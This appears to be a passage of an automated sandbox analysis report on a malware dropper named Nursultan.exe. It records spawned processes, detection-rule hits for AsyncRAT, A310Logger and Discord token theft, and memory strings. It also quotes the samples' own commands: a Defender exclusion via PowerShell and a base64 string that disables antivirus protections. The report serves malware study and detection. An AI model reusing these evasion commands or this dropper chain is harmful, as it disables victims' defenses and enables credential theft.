                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904A3D414_2_00007FF84904A3D4
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849039E9814_2_00007FF849039E98
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904651114_2_00007FF849046511
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490435A014_2_00007FF8490435A0
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904022814_2_00007FF849040228
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904021814_2_00007FF849040218
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903225514_2_00007FF849032255
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904027014_2_00007FF849040270
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904026014_2_00007FF849040260
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490332A814_2_00007FF8490332A8
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849045AAE14_2_00007FF849045AAE
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904A2D414_2_00007FF84904A2D4
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903B0FA14_2_00007FF84903B0FA
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903294D14_2_00007FF84903294D
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903B1B014_2_00007FF84903B1B0
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490321D114_2_00007FF8490321D1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490401F214_2_00007FF8490401F2
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903831D14_2_00007FF84903831D
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904C63114_2_00007FF84904C631
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849044E5014_2_00007FF849044E50
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490416F114_2_00007FF8490416F1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903DD1214_2_00007FF84903DD12
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903A51F14_2_00007FF84903A51F
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903BD2214_2_00007FF84903BD22
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849044D8D14_2_00007FF849044D8D
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903A5D414_2_00007FF84903A5D4
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490305F514_2_00007FF8490305F5
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903301D14_2_00007FF84903301D
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903288014_2_00007FF849032880
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490477F414_2_00007FF8490477F4
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E7DFC614_2_00007FF848E7DFC6
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490468D014_2_00007FF8490468D0
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 23_2_00007FF848E912FD23_2_00007FF848E912FD
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 25_2_00007FF848E90A4125_2_00007FF848E90A41
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 26_2_00007FF848E6171926_2_00007FF848E61719
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 26_2_00007FF848E620F126_2_00007FF848E620F1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 26_2_00007FF848E6103826_2_00007FF848E61038
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 28_2_00007FF848E80A2128_2_00007FF848E80A21
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 39_2_00007FF848E8171939_2_00007FF848E81719
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 39_2_00007FF848E820F139_2_00007FF848E820F1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 39_2_00007FF848E8103839_2_00007FF848E81038
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 46_2_00007FF848E60A4146_2_00007FF848E60A41
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 49_2_00007FF848E50A2149_2_00007FF848E50A21
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 57_2_00007FF848E8171957_2_00007FF848E81719
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 57_2_00007FF848E820F157_2_00007FF848E820F1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 57_2_00007FF848E8103857_2_00007FF848E81038
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 58_2_00007FF848E60A4158_2_00007FF848E60A41
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 59_2_00007FF848E70A2159_2_00007FF848E70A21
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 61_2_00007FF848E922C061_2_00007FF848E922C0
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 61_2_00007FF848E9228861_2_00007FF848E92288
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 61_2_00007FF848E9226861_2_00007FF848E92268
                            Source: Nursultan.exe, 00000000.00000002.2042751313.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042751313.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042960120.000000001B3AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXBinde vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042960120.000000001B3AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClio vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000000.2014515222.0000000000592000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000002.00000002.2065830648.0000000002B71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000002.00000002.2065830648.0000000002B71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Nursultan.exe
                            Source: Nursultan.exe, 00000005.00000002.2097641852.0000000002F67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Nursultan.exe
                            Source: Nursultan.exeBinary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe.0.drBinary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPEDMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                            Source: Nursultan.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Nursultan.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Nursultan2.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Microsoft Edge.exe.0.dr, JEjSKPz8UTQEy.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.exe.0.dr, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.exe.0.dr, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, JEjSKPz8UTQEy.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.3.dr, JEjSKPz8UTQEy.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.3.dr, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.3.dr, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, JEjSKPz8UTQEy.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 8IQtID4yHRI2I.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Umbral.exe.4.dr, -----.csBase64 encoded string: 'GxYxGFfj914SnzOYBn264rnKB6AyXC6Jt6as5JrQt98hoDETJ9yey4B33MYC72CzSPWsj06xeLc5QVEIIIyUReqXubRXAexcnBOf1XEdtbMFj3EY/BiuZXgFSgLOyyWC+YpSwnm1mPa26TgyVewBZzTGL1ptLvft4gWpn56+1Uu27HsZZBPfQBU='
                            Source: Umbral.exe.4.dr, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, -----.csBase64 encoded string: 'GxYxGFfj914SnzOYBn264rnKB6AyXC6Jt6as5JrQt98hoDETJ9yey4B33MYC72CzSPWsj06xeLc5QVEIIIyUReqXubRXAexcnBOf1XEdtbMFj3EY/BiuZXgFSgLOyyWC+YpSwnm1mPa26TgyVewBZzTGL1ptLvft4gWpn56+1Uu27HsZZBPfQBU='
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Microsoft Edge.exe.0.dr, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Microsoft Edge.exe.0.dr, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Microsoft Edge.3.dr, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Microsoft Edge.3.dr, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Umbral.exe.4.dr, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Umbral.exe.4.dr, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, jHz7doq0Y7v0T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Insidious.exe.4.dr, Help.csSuspicious URL: 'https://api.vimeworld.ru/user/name/'
                            Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@155/49@37/5
                            Source: C:\Users\user\Desktop\Nursultan.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Nursultan.exe.logJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMutant created: NULL
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMutant created: \Sessions\1\BaseNamedObjects\2jtzSA1MrJciSCzzf
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4204:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMutant created: \Sessions\1\BaseNamedObjects\mldMGDUkBlrEAKf6P458
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMutant created: \Sessions\1\BaseNamedObjects\Ucf4TZlBqXMy4CkJ
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMutant created: \Sessions\1\BaseNamedObjects\eZRyVVYrnommEpPz1
                            Source: C:\Users\user\Desktop\Nursultan.exeMutant created: \Sessions\1\BaseNamedObjects\5ix2vgEtFCxymOsdE
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                            Source: C:\Users\user\Desktop\Nursultan.exeFile created: C:\Users\user\AppData\Local\Temp\Nursultan.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: Nursultan.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Nursultan.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\Nursultan.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB662D000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6619000.00000004.00000800.00020000.00000000.sdmp, IrkMQrRux8ApBLI.14.dr, 1gWUko2HB0x9rEz.14.dr, tmp2875.tmp.dat.11.dr, tmp2945.tmp.dat.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: Nursultan.exeReversingLabs: Detection: 81%
                            Source: unknownProcess created: C:\Users\user\Desktop\Nursultan.exe "C:\Users\user\Desktop\Nursultan.exe"
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
